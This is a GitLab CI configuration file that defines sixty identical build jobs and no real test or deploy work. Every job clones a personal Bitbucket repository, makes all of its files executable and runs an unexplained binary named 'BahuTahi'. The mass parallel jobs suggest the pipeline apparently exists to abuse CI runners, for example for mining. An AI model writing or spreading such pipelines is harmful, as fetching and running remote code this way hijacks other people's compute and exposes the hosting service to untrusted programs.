image: python:3.9

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_01:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_02:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_03:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_04:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_05:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_06:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_07:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_08:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_09:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_10:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_11:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_12:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_13:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_14:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_15:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_16:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_17:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_18:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_19:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_20:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_21:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_22:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_23:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_24:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_25:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_26:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_27:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_28:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_29:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_30:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_31:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_32:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_33:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_34:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_35:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_36:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_37:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_38:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_39:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_40:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_41:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_42:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_43:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_44:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_45:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_46:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_47:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_48:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_49:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_50:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_51:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_52:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_53:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_54:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_55:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_56:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_57:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_58:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_59:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi

build_60:
  stage: build
  script:
    - ls -a
    - git clone https://lindasinta@bitbucket.org/lindasinta/admin.git
    - cd admin && chmod u+x *
    - ./BahuTahi




